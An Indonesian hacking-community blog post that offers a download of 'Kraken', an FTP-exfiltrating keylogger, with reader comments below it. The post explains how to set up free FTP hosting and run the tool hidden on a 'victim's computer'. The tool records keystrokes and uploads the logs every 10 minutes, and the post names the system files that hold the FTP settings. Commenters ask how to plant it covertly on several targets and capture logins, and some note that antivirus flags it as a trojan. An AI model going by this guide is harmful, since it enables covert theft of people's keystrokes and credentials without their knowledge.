Kraken – XCode Yogyafree FTP Keylogger


kraken

Download Kraken FTP Keylogger

Kraken – XCode Yogyafree FTP Keylogger, adalah sebuah Keylogger buatan Yogyafree yang memungkinkan anda untuk memantau hentakan keyboard melalui protokol FTP.

1. Menyiapkan Hosting FTP
sebagai medianya yang tentu sudah disebutkan diatas, anda perlu hosting FTP. Anda bisa gunakan jasa hosting gratis seperti driveq (google : free ftp hosting). sebagai contohnya disini penulis menggunakan jasa hosting ftp gratis dari www.drivehq.com. silahkan daftar dan aktifkan account FTP anda.

2. Setting Kraken di Komputer korban
Klik Kraken.exe dan anda akan mendapatkan tampilan awal Kraken.
Isi alamat FTP, user dan password dengan account yang telah anda buat
contoh:
Ftp Address : ftp.drivehq.com
User : UserAnda
Password : PasswordAnda

Pastikan anda mengisinya secara benar karena kraken akan tidak terlihat di layar monitor setelah anda klik “Start”.

3. Unleash The Kraken
Klik “Start” dan kraken akan bekerja dibalik layar komputer
Kraken akan merekam hentakan keyboard dan menyimpannya dengan nama file
filerekam-NAMAKOMP-TanggalRekaman.txt.

Setiap 10 menit, kraken akan mengirimkan log file ke hosting ftp anda

Hasil rekaman keyboard dapat anda pantau melalui website.

4. Merubah tujuan kiriman FTP
Jika anda ingin mengubah tujuan kiriman log file, Anda bisa ke C:\WINDOWS\ dan cari file
C:\windows\ftp.txt untuk mengubah alamat ftp
C:\windows\userftp.txt untuk mengubah username
C:\windows\ftppass.txt untuk mengubah password

Gunakan dengan resiko anda.

, , , , , ,

  1. #1 by Ariq Naufal "Noballz" on 2012/04/22 - 3:44 pm

    Kak saya mau tanya,
    1. Download Kraken nya brbntuk installer atau brbntuk RAR(spt xcodexploitscanner, dll)?
    2. Setelah kita klik ” START” kan krakennya akan otomatis work, nah krakennya itu langsung masuk ke daftar “startup windows” ga?
    3. Kalo tidak masuk ke dftr, bagaimana cara memasukkan kraken tsbt ke daftar startup scara manual?
    Balesnya lewat email ya kok ka ([email protected])Trimakasih atas jawabannya..

    ./Noballz

  2. #2 by Poni on 2012/04/23 - 12:32 pm

    1.exe
    2. Ya

  3. #3 by Topo W on 2012/04/23 - 9:46 pm

    Kakak saya mo tanya, knpa ya saat dilihat di website drivehq kok gak keluar file terekamnya…apakah ada settingan lainnya.. sebelumnya thank..

  4. #4 by Simson on 2012/04/25 - 7:32 am

    gan..i wanna ask….

    kalo udah download dan instal(sampai klik start di komputer korban…. gimana cara setting agar lognya bisa masuk ke ftp kita?

  5. #5 by Poni on 2012/04/26 - 12:44 pm

    @Topo . keylogger ini mengirimkan file log setiap 10 menit sekali ke account yang telah anda tentukan. dan pastinya komputer korban harus tetap konek ke internet. Jika gagal, coba download dan setting ulang. pastikan ftpnya sudah terisi secara benar.
    cth : http://ftp.drivehq.com . jika anda mengisinya dgn http://www.drivehq.com, maka file tidak akan terkirim.

    @simson. baca tutornya.

  6. #6 by astoadhi on 2012/04/26 - 5:50 pm

    bagaimana merubah file log yg terkirim setiap 10 menit? pengenya dirubah setiap 1 jam atau yang lain.
    terima kasih

  7. #7 by themz on 2012/04/27 - 9:59 pm

    mau tanya gan
    apa bisa ditanam ke beberapa komputer dengan hanya 1 akun ftp??
    mksih..

  8. #9 by Mgso4 on 2012/04/29 - 10:35 am

    mas saya udah tanam tapi kok hasil file rekamnya ga terkirim ke FTP punya saya, padahal semuanya sudah isi dengan benar.tetapi hasil rekamnya ada di komputer yg saya tanam dan selalu merekam.. kenapa yah mas??

    mohon pencerahannya :D

  9. #10 by mgso4 on 2012/04/29 - 11:17 am

    mas saya udah tanam di target, dan saya sudah setting sesuai dengan tutor.. tetapi file lognya tidak terkirim ke FTP saya, dan di komputer target ada file rekamnya.. dan krakennya terus merekam aktifitas di komputer target,…. nah ada solusinya mas supaya File rekamannya terkirim ke FTP saya???

    mohon pencerahannya mas :D

    makasih

  10. #11 by triballhead on 2012/05/02 - 4:07 pm

    numpang tanya gan,,,
    1. bisa di install selain di default disk? (di d ato yang lain, bila komp target pake deepfreeze ato semacamnya)
    2. Terdetek di add remove program?
    3. bisa setting waktu pengiriman lebih lama?

    ty before..

  11. #12 by Army on 2012/05/04 - 4:42 pm

    mas Kraken – XCode Yogyafree FTP Keylogger kita download terdeteksi firus trojan itu gimana mas apa emang begitu. caranya download gimana. tolong jawabannya mas.

  12. #13 by ghen on 2012/05/10 - 4:48 pm

    gan,, cara untuk menguninstal nya lgi gimana y gan????

  13. #14 by handy on 2012/05/14 - 7:52 am

    apakah work pada semua windo*s????

  14. #15 by Ǝpoɔ ɹɐƃƃuǝ on 2012/05/17 - 8:41 am

    cara menghiddennya gimana kak ??
    biar saat merekam tiddak kelihatan di desktop ?

  15. #16 by Ǝpoɔ ɹɐƃƃuǝ on 2012/05/17 - 8:59 am

    kalo uninstallnya gimana kak ?

  16. #17 by ingin_tahu on 2012/05/24 - 12:01 pm

    gan untuk source codenya ad engga, #pengen tw scriptnya, pengen belajar nge-mod program ^__________^

  17. #18 by riotra on 2012/06/05 - 3:37 pm

    om.. cara uninstallnya gimana?

  18. #19 by yansen on 2012/06/06 - 1:35 pm

    gan kok kedeteek virus aaplikasinya spyware

  19. #20 by simplechange on 2012/06/28 - 9:32 am

    nga epektif gan… bayak kekuranganya.. ribet klo harus ngistal dulu di komputer orang..

    lebih bagus lagi dong biar sikorban bisa ngeklik sendiri trus program terinstal sendiri tampa ketahuan itu keyloger…

  20. #21 by masantoso on 2012/07/12 - 5:04 am

    karena kita musti nginstall dulu di komputer orang, maka cepat atau lambat sudah pasti bakal ketahuan kalau dipasang software ini.

  21. #22 by Dimas on 2012/07/29 - 4:38 pm

    mas,mau nanya,untuk menjalankankan kraken tersebut tanpa menekan tombol start apakah bisa? karena bukannya data yang di file txt sudah terindex. dan bagaimana cara remove kraken ini dari system.

  22. #23 by Dimas on 2012/07/30 - 1:44 pm

    mas kok gak bisa ya? file nya juga nambah terus, aku coba sendiri di kompi ku, file log di tempat ku terus bertambah sampai 12 Mb terus nambah, ganggu pengiriman apa ya mas?

  23. #24 by zul fahmi on 2012/08/15 - 5:57 am

    mau tanya ni kok hasil crakennya masuk ke komputer saya sendiri kok gak masuk ke yang di tentuin sehingga membuat file ukuran yang sangat besar di laptop saya?
    itu gmna caranya?
    n cara menghapusnya agar tdak muncul lagi gimana?

  24. #25 by SIK on 2012/10/30 - 11:53 am

    Langsung ke TKP

  25. #26 by Weky on 2012/11/06 - 3:01 pm

    gan, we mw nanya ne,
    itu ngerekam ketikan yang di game2 ga ? keg login game gitu, atau hanya browser ? thx sblumnya :D

  26. #27 by vista on 2013/01/31 - 9:44 am

    kak….untuk setting krakennya apakah kita harus menginstal langsung di komputer target? mohon jawabannya kak

  27. #28 by Mikhael on 2013/07/13 - 10:47 pm

    Gan Cara Matiin Kraken Gmna?

  28. #29 by Dear on 2013/07/16 - 2:04 am

    kaga bisa di download..??
    ane pakek IDM… atau apa gara” anti virusnx..??

(will not be published)